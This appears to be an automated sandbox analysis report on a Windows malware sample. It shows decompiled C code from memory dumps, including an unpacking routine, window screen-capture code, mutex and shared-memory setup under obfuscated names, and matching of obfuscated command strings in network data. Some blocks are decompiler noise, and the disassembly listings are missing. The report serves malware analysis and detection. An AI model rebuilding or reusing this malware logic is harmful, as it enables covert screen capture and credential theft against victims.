    				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
    				_push(0x6a03de01);
    				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
    				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
    				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
    				_t230 = _t229 + _t249;
    				asm("repne add ecx, [ebp+0x1]");
    				asm("repe add esi, [edi]");
    				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
    				asm("std");
    				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
    				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
    				_t111 = 0x3e +  *_t195 * 0x7e;
    				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
    				_t112 = _t111 + 0xc;
    				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
    				_t113 = _t112 + 1;
    				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
    				_t114 = _t113 + 0xf2;
    				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
    				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
    				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
    				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
    				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
    				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
    				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
    				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
    				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
    				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
    				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
    				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
    				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
    				_t127 = _t114 + 0x99a;
    				_t128 = _t127 + 0xc1;
    				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
    				_t133 = _t132 + 0xca;
    				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
    				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
    				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
    				asm("sbb eax, [esi]");
    				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
    • Instruction ID: 97992bde24c046a6897ea3d3d74e00cd9fd59e8f3269b1bc45476090c5f7383c
    • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
    • Instruction Fuzzy Hash: FF81C5319893918BC795DF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00419174(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				unsigned int _t67;
    				signed int _t68;
    				intOrPtr _t71;
    				void* _t79;
    				signed int _t81;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				signed int _t98;
    				signed int _t99;
    				signed int _t100;
    				signed int _t101;
    				signed int _t102;
    				unsigned int _t103;
    				signed int _t104;
    				signed int _t106;
    				signed int _t108;
    				signed int _t111;
    				signed int _t115;
    				signed int _t116;
    				intOrPtr* _t119;
    				unsigned int _t125;
    				signed int _t126;
    				signed int _t128;
    
    				_t71 = _a4;
    				_t98 = 0;
    				_t99 = 0;
    				_v16 = 0;
    				_v20 = 1;
    				L1:
    				while(1) {
    					if(_t99 == 0) {
    						_t103 =  *(_t98 + _t71);
    						_t98 = _t98 + 4;
    						_t99 = 0x1f;
    						_t104 = _t103 >> 0x1f;
    					} else {
    						_t99 = _t99 - 1;
    						_t104 = _t67 >> _t99 & 0x00000001;
    					}
    					if(_t104 != 0) {
    						_v16 = _v16 + 1;
    						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
    						_t98 = _t98 + 1;
    						L6:
    						_t71 = _a4;
    						continue;
    					}
    					_v12 = 1;
    					do {
    						if(_t99 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t100 = 0x1f;
    							_t106 = _t67 >> 0x1f;
    						} else {
    							_t100 = _t99 - 1;
    							_t106 = _t67 >> _t100 & 0x00000001;
    						}
    						_v12 = _t106 + _v12 * 2;
    						if(_t100 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t108 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t100 - 1;
    							_t108 = _t67 >> _t99 & 0x00000001;
    						}
    					} while (_t108 == 0);
    					_t111 = _v12;
    					if(_t111 == 2) {
    						_t81 = _v20;
    						L19:
    						_v12 = _t81;
    						if(_t99 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t101 = 0x1f;
    							_v8 = _t67 >> 0x1f;
    						} else {
    							_t101 = _t99 - 1;
    							_v8 = _t67 >> _t101 & 0x00000001;
    						}
    						if(_t101 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t115 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t101 - 1;
    							_t115 = _t67 >> _t99 & 0x00000001;
    						}
    						_t116 = _t115 + _v8 * 2;
    						_v8 = _t116;
    						if(_t116 == 0) {
    							_v8 = 1;
    							do {
    								if(_t99 == 0) {
    									_t125 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t102 = 0x1f;
    									_t126 = _t125 >> 0x1f;
    								} else {
    									_t102 = _t99 - 1;
    									_t126 = _t67 >> _t102 & 0x00000001;
    								}
    								_v8 = _t126 + _v8 * 2;
    								if(_t102 == 0) {
    									_t67 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t99 = 0x1f;
    									_t128 = _t67 >> 0x1f;
    								} else {
    									_t99 = _t102 - 1;
    									_t128 = _t67 >> _t99 & 0x00000001;
    								}
    							} while (_t128 == 0);
    							_v8 = _v8 + 2;
    						}
    						asm("sbb ecx, ecx");
    						_v8 = _v8 +  ~0xd00;
    						_t87 = _v16;
    						_t119 = _t87 - _v12 + _a12;
    						_v16 = _t119;
    						 *((char*)(_t87 + _a12)) =  *_t119;
    						_t88 = _t87 + 1;
    						_v16 = _v16 + 1;
    						do {
    							 *((char*)(_t88 + _a12)) =  *_v16;
    							_t88 = _t88 + 1;
    							_v16 = _v16 + 1;
    							_t57 =  &_v8;
    							 *_t57 = _v8 - 1;
    						} while ( *_t57 != 0);
    						_v16 = _t88;
    						goto L6;
    					}
    					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
    					_t98 = _t98 + 1;
    					if(_t79 != 0xffffffff) {
    						_t81 = _t79 + 1;
    						_v20 = _t81;
    						goto L19;
    					}
    					_t68 = _a16;
    					 *_t68 = _v16;
    					return _t68 & 0xffffff00 | _t98 == _a8;
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
    • Instruction ID: cb237f5ecbc09ba7299954b414e386d201469e072867a5b5cab95661d43336dc
    • Opcode Fuzzy Hash: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
    • Instruction Fuzzy Hash: 4651C532E04525ABDB14CE58C4606EDF7B1EF85324F1A46EACD16BF385C674AD81C784
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction ID: eea1792e0e415849e641d85ba5d0de20d1c706b6ef45094b714dd468c90f76d1
    • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction Fuzzy Hash: 4AE0267A7800128BC711CE15D880943BBB6FBD8330B1382B6C8168734AC938EDC3C5D5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00408D10(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
    				char _v9;
    				signed int _v10;
    				int _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				struct tagRECT _v48;
    				struct tagRECT _v64;
    				void* _v68;
    				signed int _v72;
    				int _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				int _v88;
    				int _v92;
    				struct HDC__* _v96;
    				struct HWND__* _v100;
    				void _v104;
    				intOrPtr _v140;
    				intOrPtr _v156;
    				struct tagWINDOWINFO _v164;
    				signed int _t128;
    				signed int _t135;
    				void* _t140;
    				void* _t146;
    				signed int _t164;
    				intOrPtr _t191;
    				long _t192;
    				intOrPtr _t195;
    				long _t196;
    				long _t210;
    				long _t211;
    				long _t212;
    				long _t213;
    				signed int _t214;
    				signed int _t215;
    				RECT* _t216;
    				struct HDC__* _t217;
    				struct HDC__* _t221;
    
    				_t214 = __edx;
    				_t216 = __eax;
    				_t128 = E00408037(_a8) & 0x0000ffff;
    				_v16 = _t128;
    				if((_t128 & 0x00000001) == 0) {
    					if(_t128 == 0) {
    						_v16 = 2;
    						_t128 = _v16;
    					}
    					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
    						_v16 = _t128 & 0x0000fffd | 0x00000008;
    					}
    					_v24 = 0;
    					_v20 = 0;
    					_v28 = 0;
    					_v32 = 0;
    					_v164.cbSize = 0x3c;
    					if(GetWindowInfo(_a8,  &_v164) != 0) {
    						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
    						_v10 = _t215;
    						if(_t215 != 0) {
    							_t212 = _t216->top;
    							_t195 = _v156;
    							if(_t195 < _t212) {
    								_v20 = _t195 - _t212;
    							}
    							_t213 = _t216->left;
    							_t196 = _v164.rcWindow.left;
    							if(_t196 < _t213) {
    								_v24 = _t196 - _t213;
    							}
    						}
    						_t135 = _v16 & 0x00000002;
    						_v72 = _t135;
    						if(_t135 == 0) {
    							_a15 = _t215;
    						} else {
    							if((_v164.dwStyle & 0x20000000) == 0) {
    								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
    								if(_a15 != 0) {
    									_t210 = _t216->top;
    									_t191 = _v140;
    									if(_t191 < _t210) {
    										_v32 = _t191 - _t210;
    									}
    									_t211 = _t216->left;
    									_t192 = _v164.rcClient.left;
    									if(_t192 < _t211) {
    										_v28 = _t192 - _t211;
    									}
    								}
    							} else {
    								_a15 = 0;
    							}
    						}
    						if(_v10 != 0 || _a15 != 0) {
    							_t217 = GetDC(0);
    							if(_t217 == 0) {
    								goto L8;
    							}
    							_t221 = CreateCompatibleDC(_t217);
    							ReleaseDC(0, _t217);
    							if(_t221 == 0) {
    								goto L8;
    							}
    							_t218 = _a4;
    							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
    							_v68 = _t140;
    							if(_t140 != 0) {
    								_v9 = 1;
    								if(_v72 == 0) {
    									if((_v16 & 0x00000004) == 0) {
    										if((_v16 & 0x00000008) == 0) {
    											L56:
    											SelectObject(_t221, _v68);
    											DeleteDC(_t221);
    											return _v9;
    										}
    										if(_v24 != 0 || _v20 != 0) {
    											SetViewportOrgEx(_t221, _v24, _v20, 0);
    										}
    										_t146 = E00408C2E(_t218,  &_v64, 0);
    										__imp__PrintWindow(_a8, _t221, 0);
    										if(_t146 != 0) {
    											L55:
    											E00408C2E(_t218,  &_v64, 1);
    										} else {
    											_v9 = 0;
    										}
    										goto L56;
    									}
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E00408C2E(_t218,  &_v64, 0);
    									DefWindowProcW(_a8, 0x317, _t221, 0xe);
    									goto L55;
    								}
    								_v100 = _a8;
    								_v96 = _t221;
    								_v84 = _v48.right - _v48.left;
    								_v76 = 1;
    								_v80 = _v48.bottom - _v48.top;
    								_v92 = 0;
    								_v88 = 0;
    								TlsSetValue( *0x422e14,  &_v104);
    								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
    									_v16 = SaveDC(_t221);
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E00408C2E(_a4,  &_v64, 0);
    									_v104 = 0;
    									SendMessageW(_a8, 0x85, 1, 0);
    									if(_v104 == 0) {
    										DefWindowProcW(_a8, 0x317, _t221, 2);
    									}
    									E00408C2E(_a4,  &_v64, 1);
    									RestoreDC(_t221, _v16);
    								}
    								if(_a15 != 1) {
    									L49:
    									TlsSetValue( *0x422e14, 0);
    									goto L56;
    								} else {
    									if(_v28 != 0) {
    										L41:
    										_a15 = 1;
    										L42:
    										_v16 = SaveDC(_t221);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										E00408C2E(_a4,  &_v48, 0);
    										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
    										asm("sbb eax, eax");
    										_v76 =  ~_t164 + 1;
    										RestoreDC(_t221, _v16);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										_v104 = 0;
    										SendMessageW(_a8, 0xf, 0, 0);
    										if(_v104 == 0) {
    											DefWindowProcW(_a8, 0x317, _t221, 4);
    										}
    										E00408C2E(_a4,  &_v48, 1);
    										goto L49;
    									}
    									_a15 = 0;
    									if(_v32 == 0) {
    										goto L42;
    									}
    									goto L41;
    								}
    							}
    							DeleteDC(_t221);
    							goto L8;
    						} else {
    							goto L1;
    						}
    					}
    					L8:
    					return 0;
    				}
    				L1:
    				return 1;
    			}











































    [Disassembly listing for E00408D10, addresses 0x00408d10-0x0040909a: only the address column survived extraction; instruction text not available]

    APIs
      • Part of subcall function 00408037: GetClassNameW.USER32 ref: 00408052
    • GetWindowInfo.USER32 ref: 00408D7C
    • SelectObject.GDI32(00000000,?), ref: 0040904B
    • DeleteDC.GDI32(00000000), ref: 00409052
    • SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040907A
    • PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 00409090
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
    • String ID: <
    • API String ID: 3458064076-4251816714
    • Opcode ID: 18856e341b86337cee409d4b2db5e82424cd26005bd9a545d6c038b0bd56d663
    • Instruction ID: 8971ae914542768936780ac019e5349d321b65d31754214ac9f8e8e5c9fbefc5
    • Opcode Fuzzy Hash: 18856e341b86337cee409d4b2db5e82424cd26005bd9a545d6c038b0bd56d663
    • Instruction Fuzzy Hash: 13C16F71D01249EFDF119FA4CE44AEEBBB9AF04300F04813AF955B62A1DB388E45DB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040809E(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
    				char _v5;
    				struct HDC__* _v12;
    				char _v16;
    				short _v124;
    				void* _v134;
    				char _v612;
    				char _v1522;
    				char _v1636;
    				void* _t60;
    				long _t62;
    				void* _t66;
    				void* _t71;
    				void* _t75;
    				void* _t79;
    				void* _t80;
    				struct HDC__* _t82;
    				int _t85;
    				void* _t87;
    				signed char _t90;
    				void* _t92;
    				void* _t107;
    				struct HDC__* _t108;
    				void* _t109;
    				void* _t111;
    				void* _t112;
    				void* _t120;
    				void** _t124;
    
    				_t124 = __esi;
    				_t120 = __edx;
    				E004164D4(_t60, __esi, 0, 0x18c);
    				_t62 = TlsAlloc();
    				__esi[1] = _t62;
    				if(_t62 != 0xffffffff) {
    					E00406762(0x84889911,  &_v124, 0);
    					_t66 = RegisterWindowMessageW( &_v124);
    					__esi[2] = _t66;
    					__eflags = _t66;
    					if(_t66 == 0) {
    						goto L1;
    					}
    					E00406762(0x84889912,  &_v124, 1);
    					_t71 = CreateEventW(0x422978, 1, 0,  &_v124);
    					__esi[3] = _t71;
    					__eflags = _t71;
    					if(_t71 == 0) {
    						goto L1;
    					}
    					E00406762(0x18782822,  &_v124, 1);
    					_t75 = CreateMutexW(0x422978, 0,  &_v124);
    					__esi[5] = _t75;
    					__eflags = _t75;
    					if(_t75 == 0) {
    						goto L1;
    					}
    					E00406762(0x9878a222,  &_v124, 1);
    					_t79 = CreateFileMappingW(0, 0x422978, 4, 0, 0x3d09128,  &_v124);
    					 *__esi = _t79;
    					__eflags = _t79;
    					if(_t79 == 0) {
    						goto L1;
    					}
    					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
    					__eflags = _t80;
    					if(_t80 == 0) {
    						goto L1;
    					}
    					__esi[4] = _t80;
    					__esi[6] = _t80 + 0x128;
    					_v5 = 0;
    					_t82 = GetDC(0);
    					_v12 = _t82;
    					__eflags = _t82;
    					if(_t82 == 0) {
    						L22:
    						return _v5;
    					}
    					__esi[9] = 0;
    					__esi[0xa] = 0;
    					__esi[0xb] = GetDeviceCaps(_t82, 8);
    					_t85 = GetDeviceCaps(_v12, 0xa);
    					_t21 =  &(_t124[0xb]); // 0x0
    					_t118 =  *_t21;
    					__esi[0xc] = _t85;
    					__eflags = CreateCompatibleBitmap(_v12,  *_t21, _t85);
    					if(__eflags == 0) {
    						_t87 = 0;
    						__eflags = 0;
    					} else {
    						_t24 =  &(_t124[8]); // 0x422e30
    						_t87 = E0041C9CD(_t118, _t120, __eflags, _v12,  &_v16, _t24, 0, 0, _t86);
    					}
    					_t124[7] = _t87;
    					ReleaseDC(0, _v12);
    					__eflags = _t124[7];
    					if(_t124[7] != 0) {
    						_t119 = _v16;
    						_t90 =  *(_v16 + 0xe) >> 3;
    						_t124[0xe] = _t90;
    						_t33 =  &(_t124[0xb]); // 0x0
    						_t92 = (_t90 & 0x000000ff) *  *_t33;
    						_t124[0xd] = _t92;
    						__eflags = _t92 & 0x00000003;
    						if((_t92 & 0x00000003) != 0) {
    							_t92 = (_t92 & 0xfffffffc) + 4;
    							__eflags = _t92;
    						}
    						_t124[0xd] = _t92;
    						E00416421(_t119);
    						__eflags = _a4 - 1;
    						_v5 = 1;
    						if(_a4 != 1) {
    							goto L22;
    						}
    						_v5 = 0;
    						E00406A39( &_v1636);
    						E00406A66(_t119,  &_v612);
    						_t43 =  &(_t124[0xf]); // 0x422e4c
    						E0041645D(_t43, 0x422bb8, 0x10);
    						_t124[0x13] = _v134;
    						_t47 =  &(_t124[0x14]); // 0x422e60
    						E0041645D(_t47,  &_v1522, 0x102);
    						E00406762(0x1898b122,  &_v124, 1);
    						_t107 = CreateMutexW(0x422978, 0,  &_v124);
    						_t124[0x58] = _t107;
    						__eflags = _t107;
    						if(_t107 == 0) {
    							goto L1;
    						}
    						_t108 = GetDC(0);
    						_a4 = _t108;
    						__eflags = _t108;
    						if(_t108 != 0) {
    							_t109 = CreateCompatibleDC(_t108);
    							_t124[0x55] = _t109;
    							__eflags = _t109;
    							if(_t109 != 0) {
    								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
    								_t124[0x57] = _t111;
    								__eflags = _t111;
    								if(_t111 != 0) {
    									_t55 =  &(_t124[0x55]); // 0x0
    									_t112 = SelectObject( *_t55, _t111);
    									_t124[0x56] = _t112;
    									__eflags = _t112;
    									if(_t112 != 0) {
    										_v5 = 1;
    									}
    								}
    							}
    							ReleaseDC(0, _a4);
    						}
    					}
    					goto L22;
    				}
    				L1:
    				return 0;
    			}






























    [Disassembly listing for E0040809E, addresses 0x0040809e-0x00408300: only the address column survived extraction; instruction text not available]

    APIs
    • TlsAlloc.KERNEL32(00422E10,00000000,0000018C,00000000,00000000), ref: 004080B7
    • RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 004080DF
    • CreateEventW.KERNEL32(00422978,00000001,00000000,?,84889912,?,00000001), ref: 00408109
    • CreateMutexW.KERNEL32(00422978,00000000,?,18782822,?,00000001), ref: 0040812C
    • CreateFileMappingW.KERNEL32(00000000,00422978,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 00408157
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040816D
    • GetDC.USER32(00000000), ref: 0040818A
    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004081AA
    • GetDeviceCaps.GDI32(?,0000000A), ref: 004081B4
    • CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 004081C7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
    • String ID: x)B
    • API String ID: 3765073151-2033672109
    • Opcode ID: 1f308d8783beb4ac953aa6ade088183827677b61a3b0b26ade5ddab32361e433
    • Instruction ID: 189b5de288d8e877e26bb0b8cae87b3110a72e1e4a9bfa3d6f60ad39a81ca0ce
    • Opcode Fuzzy Hash: 1f308d8783beb4ac953aa6ade088183827677b61a3b0b26ade5ddab32361e433
    • Instruction Fuzzy Hash: 767133B5900744AFD7209FB0CD89EEB7BACEB44304F10487EF592E3691D67999858F14
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00415CD2(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
    				char _v536;
    				char _v652;
    				char _v664;
    				char _v696;
    				char _v700;
    				char _v701;
    				char _v708;
    				void* __esi;
    				char* _t35;
    				void* _t40;
    				char* _t43;
    				intOrPtr _t44;
    				void* _t47;
    				void* _t54;
    				void* _t56;
    				intOrPtr _t57;
    				signed int _t58;
    				signed int _t60;
    				void* _t61;
    				signed int* _t71;
    				intOrPtr _t73;
    				signed int _t75;
    				signed char _t76;
    				intOrPtr _t79;
    				signed int _t80;
    				intOrPtr _t83;
    				signed int* _t84;
    				intOrPtr _t85;
    				void* _t87;
    				char* _t92;
    				void* _t93;
    				intOrPtr* _t94;
    
    				_t80 = __edx;
    				_t87 = __eax;
    				_t71 = __ecx;
    				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
    					L51:
    					_t35 = 0;
    					__eflags = 0;
    				} else {
    					if(__eax <= 6) {
    						L24:
    						__eflags = _t87 - 1;
    						if(_t87 <= 1) {
    							goto L51;
    						} else {
    							EnterCriticalSection(0x42311c);
    							_t83 = E00415BCA(_a4);
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags =  *((intOrPtr*)(_t83 + 4));
    								if( *((intOrPtr*)(_t83 + 4)) == 0) {
    									L48:
    									_push(0);
    									goto L49;
    								} else {
    									__eflags =  *((intOrPtr*)(_t83 + 8));
    									if( *((intOrPtr*)(_t83 + 8)) == 0) {
    										goto L48;
    									} else {
    										__eflags = _t87 - 3;
    										if(_t87 < 3) {
    											L33:
    											__eflags = _t87 - 4;
    											if(_t87 >= 4) {
    												_t75 =  *_t71 ^ 0x01050809;
    												__eflags = _t75 - 0x4455515d;
    												if(_t75 == 0x4455515d) {
    													goto L37;
    												} else {
    													__eflags = _t75 - 0x55444d4f;
    													if(_t75 == 0x55444d4f) {
    														goto L37;
    													} else {
    														__eflags = _t75 - 0x57564959;
    														if(_t75 != 0x57564959) {
    															__eflags = _t75 - 0x55445c5a;
    															if(_t75 == 0x55445c5a) {
    																L40:
    																_t76 = 0x65;
    																_push(0x15);
    																goto L41;
    															} else {
    																__eflags = _t75 - 0x55564145;
    																if(_t75 == 0x55564145) {
    																	goto L40;
    																}
    															}
    														} else {
    															goto L37;
    														}
    													}
    												}
    											}
    										} else {
    											_t58 =  *_t71;
    											__eflags = _t58 - 0x43;
    											if(_t58 == 0x43) {
    												L31:
    												__eflags = _t71[0] - 0x57;
    												if(_t71[0] != 0x57) {
    													goto L33;
    												} else {
    													__eflags = _t71[0] - 0x44;
    													if(_t71[0] == 0x44) {
    														L37:
    														_t76 = 0x64;
    														_push(0x14);
    														L41:
    														_pop(_t40);
    														E004159A4(_t40,  &_v696);
    														_t43 =  &_v652;
    														_v700 = 0x80;
    														__imp__#5(_a4, _t43,  &_v700);
    														__eflags = _t43;
    														if(_t43 == 0) {
    															_t78 =  &_v664;
    															_t44 = E004198CB( &_v664);
    															__eflags = _t44;
    															if(_t44 == 0) {
    																__eflags = _t76 - 0x65;
    																if(_t76 == 0x65) {
    																	L46:
    																	E00419882( &_v664, _t78,  &_v536);
    																	_t47 = 0x13;
    																	E004159A4(_t47,  &_v696);
    																	_push( &_v536);
    																	_push( *((intOrPtr*)(_t83 + 8)));
    																	_push( *((intOrPtr*)(_t83 + 4)));
    																	E00405851(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
    																} else {
    																	__eflags = _t76 - 0x64;
    																	if(_t76 == 0x64) {
    																		_t92 =  &_v696;
    																		_t54 = 0x16;
    																		E004159A4(_t54, _t92);
    																		_push( *((intOrPtr*)(_t83 + 4)));
    																		_t80 = _t80 | 0xffffffff;
    																		_t56 = 9;
    																		_t78 = _t92;
    																		_t57 = E00417031(_t56, _t92, _t80);
    																		__eflags = _t57;
    																		if(_t57 != 0) {
    																			goto L46;
    																		}
    																	}
    																}
    															}
    														}
    														_push(0);
    														L49:
    														E00415C69(_t83);
    													} else {
    														goto L33;
    													}
    												}
    											} else {
    												__eflags = _t58 - 0x50;
    												if(_t58 != 0x50) {
    													goto L33;
    												} else {
    													goto L31;
    												}
    											}
    										}
    									}
    								}
    							}
    							_t73 = 0;
    							goto L23;
    						}
    					} else {
    						_t60 =  *__ecx ^ 0x01050809;
    						if(_t60 == 0x53405b5c || _t60 == 0x52564959) {
    							if(_t71[1] != 0x20) {
    								goto L24;
    							} else {
    								_t61 = 0;
    								_t93 = _t87 + 0xfffffffb;
    								_t84 =  &(_t71[1]);
    								if(_t93 == 0) {
    									goto L51;
    								} else {
    									while(1) {
    										_t79 =  *((intOrPtr*)(_t61 + _t84));
    										if(_t79 == 0xd || _t79 == 0xa) {
    											break;
    										}
    										if(_t79 < 0x20) {
    											goto L51;
    										} else {
    											_t61 = _t61 + 1;
    											if(_t61 < _t93) {
    												continue;
    											} else {
    												break;
    											}
    										}
    										goto L52;
    									}
    									if(_t61 == 0 || _t61 == _t93) {
    										goto L51;
    									} else {
    										_t85 = E00416661(_t61, 0xfde9, _t84);
    										if(_t85 == 0) {
    											goto L51;
    										} else {
    											_v701 = 0;
    											EnterCriticalSection(0x42311c);
    											_t94 = E00415BCA(_a4);
    											if(_t94 != 0) {
    												L18:
    												__eflags =  *_t71 - 0x55;
    												_v701 = 1;
    												if( *_t71 != 0x55) {
    													E00416421( *((intOrPtr*)(_t94 + 8)));
    													 *((intOrPtr*)(_t94 + 8)) = _t85;
    												} else {
    													E00415C69(_t94, 1);
    													 *((intOrPtr*)(_t94 + 4)) = _t85;
    												}
    												 *_t94 = _a4;
    											} else {
    												_t94 = E00415C03(_a4);
